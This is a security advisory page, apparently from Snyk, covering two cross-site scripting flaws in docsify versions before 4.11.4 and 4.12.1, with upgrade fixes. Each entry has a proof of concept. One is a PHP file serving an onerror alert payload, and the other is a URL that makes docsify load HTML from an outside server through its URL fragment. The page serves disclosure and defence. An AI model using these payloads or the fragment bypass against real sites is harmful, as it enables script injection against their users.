docsify@2.4.1 vulnerabilities

A magical documentation generator.

Direct Vulnerabilities

Known vulnerabilities in the docsify package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Cross-site Scripting (XSS)

docsify is a magical documentation site generator.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). It is possible to bypass the remediation done by CVE-2020-7680 and execute malicious JavaScript through the following methods

  1. When parsing HTML from remote URLs, the HTML code on the main page is sanitized, but this sanitization is not taking place in the sidebar.

  2. The isURL external check can be bypassed by inserting more “////” characters

PoC

* Have a running PHP webserver with the following code 
<?php
header("Access-Control-Allow-Origin: *"); 

?>
<img src=x onerror=alert(document.domain)> 


* Access your docisfy instance as follows: http://yourdocsifyserver/#//yourserver.local:8090/test.php/

Note: The fix for this issue is within release 4.12.1, not 4.12.0

How to fix Cross-site Scripting (XSS)?

Upgrade docsify to version 4.12.1 or higher.

<4.12.1
  • H
Cross-site Scripting (XSS)

docsify is a magical documentation site generator.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). Docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. Due to lack of validation here, it is possible to provide external URLs after the /#/ (domain.com/#//attacker.com) and render arbitrary JavaScript/HTML inside docsify page.

PoC

https://docsify.js.org/#//asharifi.pythonanywhere.com/README

How to fix Cross-site Scripting (XSS)?

Upgrade docsify to version 4.11.4 or higher.

<4.11.4